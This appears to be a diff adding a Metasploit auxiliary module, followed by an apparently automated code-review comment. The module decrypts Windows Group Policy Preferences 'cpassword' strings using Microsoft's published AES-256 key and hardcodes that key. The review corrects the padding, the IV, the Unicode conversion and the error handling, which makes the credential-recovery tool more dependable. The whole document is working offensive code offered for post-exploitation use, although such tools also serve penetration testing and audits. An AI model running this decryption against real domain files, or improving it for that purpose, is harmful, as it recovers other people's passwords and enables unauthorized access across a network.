|
| 1 | +## |
| 2 | +# This module requires Metasploit: http//metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | + |
| 8 | +class Metasploit3 < Msf::Auxiliary |
| 9 | + |
| 10 | + def initialize(info={}) |
| 11 | + super( update_info( info, |
| 12 | + 'Name' => 'Windows Gather Group Policy "cpassword" Decrypt Standalone', |
| 13 | + 'Description' => %q{ |
| 14 | + This module will allow you to specify an encrypted cpassword string |
| 15 | + using the Microsofts public AES key. This is useful if you don't or |
| 16 | + can't use the GPP post exploitation module. Just paste the cpassword |
| 17 | + encrypted string and it will output the decrypted string for you. |
| 18 | +
|
| 19 | + Tested Windows Server 2008 R2 Domain Controller. |
| 20 | + }, |
| 21 | + 'License' => MSF_LICENSE, |
| 22 | + 'Author' =>[ |
| 23 | + 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', |
| 24 | + 'Loic Jaquemet <loic.jaquemet+msf[at]gmail.com>', |
| 25 | + 'scriptmonkey <scriptmonkey[at]owobble.co.uk>', |
| 26 | + 'theLightCosine', |
| 27 | + 'mubix', #domain/dc enumeration code |
| 28 | + 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # made the standalone module for a straight password decrypt - useful for when you need to manually grab the groups.xml or scheduledtasks.xml manually and need to decrypt without running post exploitation module |
| 29 | + ], |
| 30 | + 'References' => |
| 31 | + [ |
| 32 | + ['URL', 'http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences'], |
| 33 | + ['URL', 'http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)'], |
| 34 | + ['URL', 'http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html'], |
| 35 | + ['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx'] |
| 36 | + ], |
| 37 | + )) |
| 38 | + |
| 39 | + register_options( |
| 40 | + [ |
| 41 | + OptString.new('CPASSWORD', [ true, "The encrypted cpassword string to perform decryption on."]), |
| 42 | + ], self.class) |
| 43 | + |
| 44 | + end |
| 45 | + |
| 46 | + def decrypt(encrypted_data) |
| 47 | + padding = "=" * (4 - (encrypted_data.length % 4)) |
| 48 | + epassword = "#{encrypted_data}#{padding}" |
| 49 | + decoded = Rex::Text.decode_base64(epassword) |
| 50 | + key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b" |
| 51 | + aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") |
| 52 | + aes.decrypt |
| 53 | + aes.key = key |
| 54 | + plaintext = aes.update(decoded) |
| 55 | + plaintext << aes.final |
| 56 | + pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion |
| 57 | + print_good("The decrypted AES password is: #{pass}") |
| 58 | + |
| 59 | + end |
| 60 | + |
| 61 | + def run |
| 62 | + encrypted_data = datastore['CPASSWORD'] |
| 63 | + pass = decrypt(encrypted_data) |
| 64 | + |
| 65 | + end |
| 66 | +end |
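Review bot: The UTF-16LE conversion on line 56, `pass = plaintext.unpack('v*').pack('C*')`, keeps only the low byte of each code unit, so a recovered password containing characters outside Latin-1 is silently corrupted; `plaintext.force_encoding('UTF-16LE').encode('UTF-8')` preserves it. The decrypt path also has no error handling: a truncated or hand-edited CPASSWORD makes `aes.final` raise `OpenSSL::Cipher::CipherError` and the module dies with a backtrace instead of a readable message, and an input whose length is already a multiple of 4 gets four `=` appended on line 47 (`(4 - len % 4) % 4` avoids that, which matters if the decoder is strict). The cipher on lines 51-53 never sets an IV and so relies on the library default; the MS-GPPREF format uses an all-zero IV, so `aes.iv = "\x00" * 16` makes that explicit rather than depending on a default. `OpenSSL::Cipher::Cipher` is the deprecated constant and `OpenSSL::Cipher.new` is the current form. Returning the password from `decrypt` also gives the otherwise dead `pass = decrypt(encrypted_data)` in `run` a purpose.
```ruby
  def decrypt(encrypted_data)
    # MS-GPPREF cpassword: base64, AES-256-CBC, published key, all-zero IV, UTF-16LE plaintext
    padding = '=' * ((4 - (encrypted_data.length % 4)) % 4)
    decoded = Rex::Text.decode_base64("#{encrypted_data}#{padding}")
    # … unchanged: key constant …
    aes = OpenSSL::Cipher.new('AES-256-CBC')
    aes.decrypt
    aes.key = key
    aes.iv = "\x00" * 16 # spec IV; do not rely on the library default
    plaintext = aes.update(decoded) << aes.final
    pass = plaintext.force_encoding('UTF-16LE').encode('UTF-8')
    print_good("The decrypted AES password is: #{pass}")
    pass
  rescue OpenSSL::Cipher::CipherError, EncodingError => e
    print_error("Unable to decrypt cpassword (malformed or truncated input?): #{e.message}")
    nil
  end
```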